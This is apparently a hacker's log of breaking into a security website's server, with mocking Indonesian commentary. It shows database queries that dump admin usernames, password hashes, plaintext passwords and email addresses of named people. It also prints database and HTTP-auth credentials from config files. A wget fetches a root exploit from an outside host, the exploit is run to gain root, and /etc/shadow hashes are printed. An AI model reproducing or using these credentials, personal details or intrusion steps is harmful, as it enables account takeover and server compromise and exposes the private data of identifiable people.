| contrexx_access_settings                         |

| contrexx_access_user_attribute                   |

| contrexx_access_user_attribute_name              |

| contrexx_access_user_attribute_value             |

| contrexx_access_user_core_attribute              |

| contrexx_access_user_groups                      |

| contrexx_access_user_mail                        |

| contrexx_access_user_profile                     |

| contrexx_access_user_title                       |

| contrexx_access_user_validity                    |

| contrexx_access_users                            |

| contrexx_backend_areas                           |

| contrexx_backups                                 |

| contrexx_content                                 |

| contrexx_content_history                         |

| contrexx_content_logfile                         |

| contrexx_content_navigation                      |

| contrexx_content_navigation_history              |

| contrexx_ids                                     |

| contrexx_languages                               |

| contrexx_lib_country                             |

| contrexx_log                                     |

| contrexx_module_alias_source                     |

| contrexx_module_alias_target                     |

| contrexx_module_block_blocks                     |

| contrexx_module_block_rel_lang                   |

| contrexx_module_block_rel_pages                  |

| contrexx_module_block_settings                   |

| contrexx_module_blog_categories                  |

| contrexx_module_blog_comments                    |

| contrexx_module_blog_message_to_category         |

| contrexx_module_blog_messages                    |

| contrexx_module_blog_messages_lang               |

| contrexx_module_blog_networks                    |

| contrexx_module_blog_networks_lang               |

| contrexx_module_blog_settings                    |

| contrexx_module_blog_votes                       |

| contrexx_module_calendar                         |

| contrexx_module_calendar_access                  |

| contrexx_module_calendar_categories              |

| contrexx_module_calendar_form_data               |

| contrexx_module_calendar_form_fields             |

| contrexx_module_calendar_registrations           |

| contrexx_module_calendar_settings                |

| contrexx_module_calendar_style                   |

| contrexx_module_contact_form                     |

| contrexx_module_contact_form_data                |

| contrexx_module_contact_form_field               |

| contrexx_module_contact_settings                 |

| contrexx_module_data_categories                  |

| contrexx_module_data_message_to_category         |

| contrexx_module_data_messages                    |

| contrexx_module_data_messages_lang               |

| contrexx_module_data_placeholders                |

| contrexx_module_data_settings                    |

| contrexx_module_directory_access                 |

| contrexx_module_directory_categories             |

| contrexx_module_directory_dir                    |

| contrexx_module_directory_inputfields            |

| contrexx_module_directory_levels                 |

| contrexx_module_directory_mail                   |

| contrexx_module_directory_rel_dir_cat            |

| contrexx_module_directory_rel_dir_level          |

| contrexx_module_directory_settings               |

| contrexx_module_directory_settings_google        |

| contrexx_module_directory_vote                   |

| contrexx_module_docsys                           |

| contrexx_module_docsys_categories                |

| contrexx_module_egov_configuration               |

| contrexx_module_egov_orders                      |

| contrexx_module_egov_product_calendar            |

| contrexx_module_egov_product_fields              |

| contrexx_module_egov_products                    |

| contrexx_module_egov_settings                    |

| contrexx_module_exploits                         |

| contrexx_module_exploits_categories              |

| contrexx_module_feed_category                    |

| contrexx_module_feed_news                        |

| contrexx_module_feed_newsml_association          |

| contrexx_module_feed_newsml_categories           |

| contrexx_module_feed_newsml_documents            |

| contrexx_module_feed_newsml_providers            |

| contrexx_module_forum_access                     |

| contrexx_module_forum_categories                 |

| contrexx_module_forum_categories_lang            |

| contrexx_module_forum_notification               |

| contrexx_module_forum_postings                   |

| contrexx_module_forum_rating                     |

| contrexx_module_forum_settings                   |

| contrexx_module_forum_statistics                 |

| contrexx_module_gallery_categories               |

| contrexx_module_gallery_comments                 |

| contrexx_module_gallery_language                 |

| contrexx_module_gallery_language_pics            |

| contrexx_module_gallery_pictures                 |

| contrexx_module_gallery_settings                 |

| contrexx_module_gallery_votes                    |

| contrexx_module_guestbook                        |

| contrexx_module_guestbook_settings               |

| contrexx_module_livecam                          |

| contrexx_module_livecam_settings                 |

| contrexx_module_market                           |

| contrexx_module_market_access                    |

| contrexx_module_market_categories                |

| contrexx_module_market_mail                      |

| contrexx_module_market_paypal                    |

| contrexx_module_market_settings                  |

| contrexx_module_market_spez_fields               |

| contrexx_module_mediadir_access                  |

| contrexx_module_mediadir_categories              |

| contrexx_module_mediadir_comments                |

| contrexx_module_mediadir_dir                     |

| contrexx_module_mediadir_inputfields             |

| contrexx_module_mediadir_levels                  |

| contrexx_module_mediadir_mail                    |

| contrexx_module_mediadir_rel_dir_cat             |

| contrexx_module_mediadir_rel_dir_level           |

| contrexx_module_mediadir_reports                 |

| contrexx_module_mediadir_settings                |

| contrexx_module_mediadir_settings_google         |

| contrexx_module_mediadir_vote                    |

| contrexx_module_memberdir_directories            |

| contrexx_module_memberdir_name                   |

| contrexx_module_memberdir_settings               |

| contrexx_module_memberdir_values                 |

| contrexx_module_nettools_allowed_groups          |

| contrexx_module_nettools_settings                |

| contrexx_module_news                             |

| contrexx_module_news_access                      |

| contrexx_module_news_categories                  |

| contrexx_module_news_settings                    |

| contrexx_module_news_teaser_frame                |

| contrexx_module_news_teaser_frame_templates      |

| contrexx_module_news_ticker                      |

| contrexx_module_newsletter                       |

| contrexx_module_newsletter_attachment            |

| contrexx_module_newsletter_category              |

| contrexx_module_newsletter_confirm_mail          |

| contrexx_module_newsletter_rel_cat_news          |

| contrexx_module_newsletter_rel_user_cat          |

| contrexx_module_newsletter_settings              |

| contrexx_module_newsletter_template              |

| contrexx_module_newsletter_tmp_sending           |

| contrexx_module_newsletter_user                  |

| contrexx_module_newsletter_user_title            |

| contrexx_module_onlinetools_defaultports         |

| contrexx_module_onlinetools_defaultports_back    |

| contrexx_module_onlinetools_geolitecity_blocks   |

| contrexx_module_onlinetools_geolitecity_country  |

| contrexx_module_onlinetools_geolitecity_location |

| contrexx_module_podcast_category                 |

| contrexx_module_podcast_medium                   |

| contrexx_module_podcast_rel_category_lang        |

| contrexx_module_podcast_rel_medium_category      |

| contrexx_module_podcast_settings                 |

| contrexx_module_podcast_template                 |

| contrexx_module_proxydb                          |

| contrexx_module_recommend                        |

| contrexx_module_repository                       |

| contrexx_module_securitynews_cats                |

| contrexx_module_securitynews_feeds               |

| contrexx_module_securitynews_news                |

| contrexx_module_shop_categories                  |

| contrexx_module_shop_config                      |

| contrexx_module_shop_countries                   |

| contrexx_module_shop_currencies                  |

| contrexx_module_shop_customers                   |

| contrexx_module_shop_importimg                   |

| contrexx_module_shop_lsv                         |

| contrexx_module_shop_mail                        |

| contrexx_module_shop_mail_content                |

| contrexx_module_shop_manufacturer                |

| contrexx_module_shop_order_items                 |

| contrexx_module_shop_order_items_attributes      |

| contrexx_module_shop_orders                      |

| contrexx_module_shop_payment                     |

| contrexx_module_shop_payment_processors          |

| contrexx_module_shop_pricelists                  |

| contrexx_module_shop_products                    |

| contrexx_module_shop_products_attributes         |

| contrexx_module_shop_products_attributes_name    |

| contrexx_module_shop_products_attributes_value   |

| contrexx_module_shop_products_downloads          |

| contrexx_module_shop_rel_countries               |

| contrexx_module_shop_rel_payment                 |

| contrexx_module_shop_rel_shipment                |

| contrexx_module_shop_shipment_cost               |

| contrexx_module_shop_shipper                     |

| contrexx_module_shop_vat                         |

| contrexx_module_shop_zones                       |

| contrexx_module_u2u_address_list                 |

| contrexx_module_u2u_message_log                  |

| contrexx_module_u2u_sent_messages                |

| contrexx_module_u2u_settings                     |

| contrexx_module_u2u_user_log                     |

| contrexx_modules                                 |

| contrexx_sessions                                |

| contrexx_settings                                |

| contrexx_settings_smtp                           |

| contrexx_skins                                   |

| contrexx_stats_browser                           |

| contrexx_stats_colourdepth                       |

| contrexx_stats_config                            |

| contrexx_stats_country                           |

| contrexx_stats_hostname                          |

| contrexx_stats_javascript                        |

| contrexx_stats_operatingsystem                   |

| contrexx_stats_referer                           |

| contrexx_stats_requests                          |

| contrexx_stats_requests_summary                  |

| contrexx_stats_screenresolution                  |

| contrexx_stats_search                            |

| contrexx_stats_spiders                           |

| contrexx_stats_spiders_summary                   |

| contrexx_stats_visitors                          |

| contrexx_stats_visitors_summary                  |

| contrexx_voting_additionaldata                   |

| contrexx_voting_email                            |

| contrexx_voting_rel_email_system                 |

| contrexx_voting_results                          |

| contrexx_voting_system                           |

| foo                                              |

+--------------------------------------------------+

227 rows in set (0.01 sec)



mysql> select count(*) as skids from contrexx_access_users;

+-------+

| skids |

+-------+

| 53699 |

+-------+

1 row in set (0.00 sec)



mysql> describe contrexx_access_users;

+------------------+------------------------------------------+------+-----+--------------+----------------+

| Field            | Type                                     | Null | Key | Default      | Extra          |

+------------------+------------------------------------------+------+-----+--------------+----------------+

| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |

| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |

| username         | varchar(40)                              | YES  | MUL | NULL         |                |

| password         | varchar(32)                              | YES  |     | NULL         |                |

| regdate          | int(14) unsigned                         | NO   |     | 0            |                |

| expiration       | int(14) unsigned                         | NO   |     | 0            |                |

| validity         | int(10) unsigned                         | NO   |     | 0            |                |

| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |

| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |

| email            | varchar(255)                             | YES  |     | NULL         |                |

| email_access     | enum('everyone','members_only','nobody') | NO   |     | nobody       |                |

| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |

| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |

| active           | tinyint(1)                               | NO   |     | 0            |                |

| profile_access   | enum('everyone','members_only','nobody') | NO   |     | members_only |                |

| restore_key      | varchar(32)                              | NO   |     |              |                |

| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |

| u2u_active       | enum('0','1')                            | NO   |     | 1            |                |

+------------------+------------------------------------------+------+-----+--------------+----------------+

18 rows in set (0.00 sec)



mysql> select username,password,email from contrexx_access_users where is_admin = 1;

+------------+----------------------------------+-----------------------------+

| username   | password                         | email                       |

+------------+----------------------------------+-----------------------------+

| system     | 0defe9e458e745625fffbc215d7801c5 | info@comvation.com          |

| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | prozac@astalavista.com      |

| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | paulo.santos@astalavista.ch |

| schmid     | 0defe9e458e745625fffbc215d7801c5 | ivan.schmid@comvation.com   |

+------------+----------------------------------+-----------------------------+

4 rows in set (0.04 sec)



mysql> exit;

Bye

================================================================



waduhhhh... pass admin udah di temuin deh . tapi mau di apain lagi toh si attacker sudah dapet akses r00t .

heuheuheuheu :P LANJUT ..



=================================================================

sh-3.2$ ls -la ~astanet

total 48

drwx--x--x  6 astanet astanet 4096 Dec 23 15:55 .

drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..

drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth

-rw-------  1 astanet astanet 3892 Apr 16 12:14 .bash_history

-rw-r--r--  1 astanet astanet   33 Dec 17 21:50 .bash_logout

-rw-r--r--  1 astanet astanet  176 Dec 17 21:50 .bash_profile

-rw-r--r--  1 astanet astanet  124 Dec 17 21:50 .bashrc

drwx--x--x  3 astanet astanet 4096 Dec 23 12:18 domains

drwxrwx---  3 astanet mail    4096 Dec 23 12:18 imap

drwx------  2 astanet astanet 4096 Dec 23 12:18 mail

lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html

-rw-r-----  1 astanet mail      34 Dec 22 12:41 .shadow



sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/

sh-3.2$ ls -la

total 200

drwxr-x--- 29 astanet apache   4096 Jan  6 13:58 .

drwx--x--x  8 astanet astanet  4096 Dec 23 13:53 ..

drwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007

drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql

drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 astanet@astalavista.com

drwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend

drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner

-rw-r--r--  1 astanet astanet 25724 Apr  4  2006 banner.jpg

drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config

drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron

drwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd

-rw-r--r--  1 astanet astanet    36 Jan  5  2006 error.php

-rw-r--r--  1 astanet astanet  1406 Jan  5  2006 favicon.ico

drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed

drwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour

-rw-r--r--  1 astanet astanet    18 Jan  5  2006 htaccess

-rw-r--r--  1 astanet astanet   585 Mar 24 14:50 .htaccess

-rw-r--r--  1 astanet astanet   398 Jan  5  2006 index1.php

-rw-r--r--  1 astanet astanet  1036 Jan  5  2006 _index.html

-rw-r--r--  1 astanet astanet  6880 Dec 23 14:44 index.php

-rw-r--r--  1 astanet astanet   676 Mar 21  2006 index_redirect.php

-rw-r--r--  1 astanet astanet   739 Feb 24  2006 index.swf

drwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc

drwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang

drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib

drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log

drwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member

drwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata

drwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new

-rw-r--r--  1 astanet astanet  7219 Feb 24  2006 pix1.swf

drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re

-rw-r--r--  1 astanet astanet    23 Jan  5  2006 robots.txt

drwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss

drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources

drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com

drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes

drwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src

drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl

drwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2

drwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old

-rw-r--r--  1 astanet astanet    35 Dec  4  2006 webcash.php

drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki



sh-3.2$ head -20 index.php

/**

* Mainfile (external) for astalavistaNET v2.0

*

* @copyright     Astalavista IT Engineering GmbH

* @author        Thomas Kaelin 

* @version       1.0

*/



        if ($_SERVER['PHP_SELF'] == '/webcash.php') {

                $dontStartSession = false;

        } else {

                $dontStartSession = true;

        }

        require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');

        require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');

        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.class.php');

        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.class.php');



sh-3.2$ cd config

sh-3.2$ ls -la

total 32

drwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .

drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..

-rw-r--r--  1 astanet astanet  987 Aug 11  2006 adm.conf.php

-rw-r--r--  1 astanet astanet 4937 Dec 23 15:48 com.conf.php

-rw-r--r--  1 astanet astanet  913 Aug 11  2006 cron.conf.php

-rw-r--r--  1 astanet astanet 1668 Aug 20  2008 ext.conf.php

-rw-r--r--  1 astanet astanet 2724 May 30  2007 int.conf.php



sh-3.2$ cat com.conf.php

[snip]

//member-database

$_CONFIG['db_mem_server']       = 'localhost';

$_CONFIG['db_mem_database'] = 'astanet_membersystem';

$_CONFIG['db_mem_user']         = 'astanet_db';

$_CONFIG['db_mem_password'] = 'TXwVrC7hbq';

$_CONFIG['db_mem_debug']        = false; //true or false

//ads-database

$_CONFIG['db_ads_server']       = 'localhost';

$_CONFIG['db_ads_database'] = 'astanet_ads';

$_CONFIG['db_ads_user']         = 'astanet_db';

$_CONFIG['db_ads_password'] = 'TXwVrC7hbq';

$_CONFIG['db_ads_debug']        = false; //true or false

//rainbow-database

$_CONFIG['db_rainbow_server']   = '212.254.194.163';

$_CONFIG['db_rainbow_database'] = 'rainbow';

$_CONFIG['db_rainbow_user']     = 'dinu';

$_CONFIG['db_rainbow_password'] = 'dinudinu';

$_CONFIG['db_rainbow_debug']    = false; //true or false

//mailing lists database

$_CONFIG['db_mailing_lists_server']     = 'localhost';

$_CONFIG['db_mailing_lists_database']   = 'astanet_mailing_lists';

$_CONFIG['db_mailing_lists_user']               = 'astanet_db';

$_CONFIG['db_mailing_lists_password']   = 'TXwVrC7hbq';

$_CONFIG['db_mailing_lists_debug']              = false; //true or false

//paypal

$_CONFIG['sub_pp_url']          = 'https://www.paypal.com/cgi-bin/webscr';

$_CONFIG['sub_pp_cmd']          = '_xclick';

$_CONFIG['sub_pp_business'] = 'info@astalavista.net';

$_CONFIG['sub_pp_noship']       = '1';

$_CONFIG['sub_pp_referer']      = 'https://www.paypal.com/';

[snip]



sh-3.2$ cd ..

sh-3.2$ cd member

sh-3.2$ ls -la

total 20

drwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .

drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..

-rw-r--r--  1 astanet astanet   19 Jan 13 14:02 .htaccess

-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php

sh-3.2$ cat .htaccess

SecFilterEngine off



sh-3.2$ cd ..

sh-3.2$ cd cron

sh-3.2$ ls -la

total 168

drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .

drwxr-x--- 29 astanet apache   4096 Jan  6 13:58 ..

-rw-r--r--  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php

-rw-r--r--  1 astanet astanet  2356 Aug 11  2006 0_functions.php

-rw-r--r--  1 astanet astanet  3616 Dec 23 15:44 1_daily.php

-rw-r--r--  1 astanet astanet   527 Aug 11  2006 1_fivemin.php

-rw-r--r--  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php

-rw-r--r--  1 astanet astanet   432 Aug 11  2006 1_weekly.php

-rw-r--r--  1 astanet astanet  2277 Aug 11  2006 2_advertising.php

-rw-r--r--  1 astanet astanet  4882 Dec 23 15:40 2_archives.php

-rw-r--r--  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh

-rw-r--r--  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php

-rw-r--r--  1 astanet astanet 14979 Jan 12 09:10 2_expire.php

-rw-r--r--  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php

-rw-r--r--  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh

-rw-r--r--  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php

-rw-r--r--  1 astanet astanet 15664 Sep 22  2006 2_keywords.php

-rw-r--r--  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php

-rw-r--r--  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php

-rw-r--r--  1 astanet astanet   796 Aug 11  2006 99_create_emails.php

drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email

-rw-r--r--  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php

-rw-r--r--  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php



sh-3.2$ cd ..

sh-3.2$ cd _007

sh-3.2$ ls -la

total 24

drwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .

drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..

-rw-r--r--  1 astanet astanet   96 Dec 23 15:17 .htaccess

-rw-r--r--  1 astanet astanet 3263 Jan 15  2007 index.php

-rw-r--r--  1 astanet astanet   20 Dec 27  2006 info.php

drwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap



sh-3.2$ cat  .htaccess

authType Basic

authName Admin

authUserFile /home/astanet/auth/.htadm_pwd

require valid-user



sh-3.2$ cat /home/astanet/auth/.htadm_pwd

admin2net:CR0bl65MwhfT



sh-3.2$ mysql -u astanet_db -p

Enter password:

Welcome to the MySQL monitor.  Commands end with ; or \g.

Your MySQL connection id is 275153

Server version: 5.0.45-community-log MySQL Community Edition (GPL)



Type 'help;' or '\h' for help. Type '\c' to clear the buffer.



mysql> show databases;

+-----------------------+

| Database              |

+-----------------------+

| information_schema    |

| astanet_ads           |

| astanet_mailing_lists |

| astanet_mediawiki     |

| astanet_membersystem  |

| test                  |

+-----------------------+

6 rows in set (0.00 sec)



mysql> use astanet_membersystem

Database changed

mysql> show tables;

+-----------------------------------+

| Tables_in_astanet_membersystem    |

+-----------------------------------+

| blacklist_categories              |

| blacklist_content                 |

| blacklist_levels                  |

| blacklist_mcset                   |

| dir_categories                    |

| dir_comments                      |

| dir_links                         |

| dir_temp                          |

| dir_votes                         |

| documents                         |

| documents_categories              |

| email_content                     |

| email_settings                    |

| exploits                          |

| exploits_categories               |

| exploittree_categories            |

| exploittree_exploits              |

| home_values                       |

| iso_countries                     |

| links_categories                  |

| links_records                     |

| links_unauth                      |

| links_votes                       |

| log                               |

| news_categories                   |

| news_comments                     |

| news_emoticons                    |

| news_latest                       |

| news_messages                     |

| news_statistics                   |

| news_votes                        |

| prices_content                    |

| prices_offers                     |

| rss_settings                      |

| sessions                          |

| stats_signups                     |

| u2u2                              |

| u2u_contact                       |

| u2u_settings                      |

| user_keywords_selected_categories |

| users                             |

| users_ipn_test                    |

| users_keyword_values              |

| users_profile                     |

| users_temp                        |

| users_upgrade                     |

+-----------------------------------+

46 rows in set (0.00 sec)



mysql> describe users;

+--------------------------+--------------------------------------+------+-----+---------------------+----------------+

| Field                    | Type                                 | Null | Key | Default             | Extra          |

+--------------------------+--------------------------------------+------+-----+---------------------+----------------+

| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |

| user                     | varchar(50)                          | NO   |     |                     |                |

| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |

| password                 | varchar(30)                          | NO   |     |                     |                |

| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |

| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |

| email                    | varchar(50)                          | NO   |     |                     |                |

| ip                       | varchar(15)                          | NO   |     | 0                   |                |

| proxy                    | set('0','1')                         | NO   |     | 0                   |                |

| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |

| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |

| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |

| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |

| checked                  | set('0','1','2')                     | NO   |     | 0                   |                |

| freemember               | set('0','1')                         | NO   |     | 0                   |                |

| ordertype                | set('transfer','wp','pp','mc','CnB') | YES  |     | NULL                |                |

| lang                     | tinytext                             | NO   |     |                     |                |

| adid                     | smallint(6)                          | NO   |     | 0                   |                |

| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |

| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |

| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |

| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |

+--------------------------+--------------------------------------+------+-----+---------------------+----------------+

22 rows in set (0.01 sec)



mysql> select count(*) as skids from users;

+-------+

| skids |

+-------+

| 25199 |

+-------+

1 row in set (0.00 sec)



mysql> select user,nickname,password,email from users where userlevel = 1;

+--------------------------+----------------------+------------------+-----------------------------------+

| user                     | nickname             | password         | email                             |

+--------------------------+----------------------+------------------+-----------------------------------+

| pascal                   | prozac               | astaman3         | info@astalavista.net              |

| Ivan Schmid              | rOOtless1            | astalavista4asta | ivan.schmid@comvation.com         |

| qreymer                  | Palermo              | qblsw85iam       | eche@home.se                      |

| Christian Wehrli         | g0atherd             | hitt?74          | g0atherd@gmx.net                  |

| Andrew Blake             | Minky                | liq73uid         | a.blake@har.mrc.ac.uk             |

| Martin Wyss              | dinu                 | kj63;cXy         | martin.wyss@astalavista.net       |

| Leandro Nery             | Timan_no_Sanco       | nery2002         | leandronery@hotmail.com           |

| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | shavingryansprivates1@hotmail.com |

| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | spoofedexistence@hotmail.com      |

| David M Lee              | Daremo               | icG12m03         | daremo@hackerheaven.com           |

| David Corn               | akriel               | ve3uB$cUku       | akriel@fallenroot.net             |

| Thomas Kalin             | Gwanun               | QwErTy123        | thomas.kaelin@astalavista.net     |

| Marcus unknown           | Cra58cker            | hhCr4ck06        | unknownmarcus@hotmail.com         |

| David Ellis              | dellis203            | philip           | dellis@nightwatchnss.com          |

| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | xeor@hush.com                     |

| Paulo Santos             | Be1er0ph0r1          | amor01           | pmsantos@gmx.ch                   |

| Thomas D?ppen            | daha                 | asta4tom         | thomas.daeppen@astalavista.ch     |

| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | toraj.a.m@gmail.com               |

| Fabius Bernet            | traviser             | wellenreiter100  | fabius.bernet@astalavista.ch      |

| Zachary McElroy          | duder1               | dirty245dix      | mcelroyzj@yahoo.com               |

| Leron Cohen              | cohen2               | leron4free       | leron@quiredmedia.com             |

| Beatriz Pontes           | anonymous1656        | pitas            | joao.pedro.pontes@gmail.com       |

| Glafkos Charalambous     | anonymous2086        | si99490178$#     | nowayout@webhostline.com          |

| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | ivan.schmid@astalavista.ch        |

| Peter Fisher             | cyph3r1              | testZer025435    | cyph3r@astalavista.com            |

| sykadul                  | sykadul              | ak29eral         | sykadul@gmail.com                 |

| Ronny Janzi              | commander1           | mpbdaagf6m       | ronny.janzi@astalavista.ch        |

+--------------------------+----------------------+------------------+-----------------------------------+

27 rows in set (0.00 sec)



mysql> exit;

Bye

===========================================================

ini dia user pass si admin yang berupa plain text . 

sangat ironi sekali kedengarannya .

situs IT PROFESIONAL menggunakan Plain text password . heuheuheu :P

LANJUT :P

===========================================================

sh-3.2$ uname -a

Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux

sh-3.2$ wget http://anti.sec.labs/g0troot

--13:33:37--  http://anti.sec.labs/g0troot

Resolving anti.sec.labs... 13.33.33.37

Connecting to anti.sec.labs|13.33.33.37|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 18200 (18K) [text/plain]

Saving to: `g0troot'



100%[=======================>] 18,200      58.6K/s   in 

0.3s



18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200]



sh-3.2$ ./g0troot -i x86_64

	[+] g0troot - anti.sec.labs

	[+] Target: 2.6.18-128.1.10.el5

	[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

	

	[+] r00tr00t

	[~] Executing shell...

	

sh-3.2# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)



sh-3.2# cat /etc/shadow

root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::

[snip]

admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::

jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::

com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::

astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::



sh-3.2# cat /etc/motd

#####################################################

#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #

# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #

# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #

#                                                   #

#####################################################

#                                                   #

# Admin Contact - support@secureservertech.com      #

#                                                   #

# Available ShortCuts                               #

#                                                   #

# nst -  list active connections                    #

# ddos - shows how many times each ip is connected  #

# ltr -  restart the webserver                      #

# phpc - edit the php config file                   #

# htc -  edit the webserver configuration file      #

# up -   uptime                                     #

# etd - edit the motd of the day file               #

# htr - start and restart apache if needed          #

# syng - shows active SYN_RECV connections          #

# synd - syn flood blocker - "synd -h" for usage    #

#####################################################

# NOTES:                                            #

# Last Upgrade - 12-08-2008 by JF                   #

# My.cnf/Mysql Optimization - 1-28-09               #

#                                                   #

#                                                   #

#                                                   #

#####################################################



sh-3.2# lastlog | grep -v Never

Username         Port     From             Latest

root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009

admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008

com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009

astanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009



sh-3.2# ls -la

total 453376

drwxr-x--- 15 root root       4096 Jun  4 08:40 .

drwxr-xr-x 25 root root       4096 Jun  3 02:43 ..

-rw-r--r--  1 root root    2394400 Oct 19  2007 10mbtest.zip

-rw-------  1 root root       1006 Sep 11  2007 anaconda-ks.cfg

-rw-------  1 root root      16836 Jun  4 07:21 .bash_history

-rw-r--r--  1 root root         24 Jan  6  2007 .bash_logout

-rw-r--r--  1 root root        191 Jan  6  2007 .bash_profile

-rw-r--r--  1 root root        176 Jan  6  2007 .bashrc

-rwx------  1 root root       1899 Oct 28  2007 bk.sh

-rw-r--r--  1 root root       1327 Nov 29  2007 cert

-rw-r--r--  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql

drwxr-xr-x  4 root root       4096 May 20  2008 .cpan

-rw-r--r--  1 root root        100 Jan  6  2007 .cshrc

-rw-r--r--  1 root root     323079 Mar 31 13:48 defaultp_ports.sql

drwx------  2 root root       4096 Oct 28  2007 .elinks

drwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.1

-rw-r--r--  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2

-rw-------  1 root root          0 Apr 16 13:19 .history

-rw-r--r--  1 root root      16095 Sep 11  2007 install.log

-rw-r--r--  1 root root       2566 Sep 11  2007 install.log.syslog

-rw-r--r--  1 root root       1003 Jul 22  2007 install.sh

